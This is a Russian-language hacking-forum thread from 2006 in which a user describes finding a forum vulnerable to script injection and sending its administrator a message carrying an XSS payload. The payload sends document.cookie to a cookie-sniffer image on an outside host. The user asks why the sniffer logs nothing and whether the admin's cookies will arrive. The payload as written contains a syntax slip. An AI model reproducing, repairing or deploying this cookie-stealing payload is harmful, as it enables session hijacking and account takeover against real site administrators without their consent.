HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по организации XSS атаки, на уязвимом форуме..
  #1  
Старый 09.07.2006, 10:09
a1nt
Участник форума
Регистрация: 16.12.2005
Сообщений: 146
С нами: 10736573

Репутация: 114
По умолчанию Вопрос по организации XSS атаки, на уязвимом форуме..

Нашел уязвимый форум, где можно вставить
Код:
<script></script>
. Чтобы забрать cookies админа отправил ему сообщение
Код:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Вопрос по применению XSS на форуме ExBB 1.9.1 TweakeR Уязвимости CMS / форумов 9 28.02.2006 18:24
Вопрос про проведению атаки класса XSS, в форуме Invison Power Board badboy Уязвимости CMS / форумов 10 02.06.2005 22:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.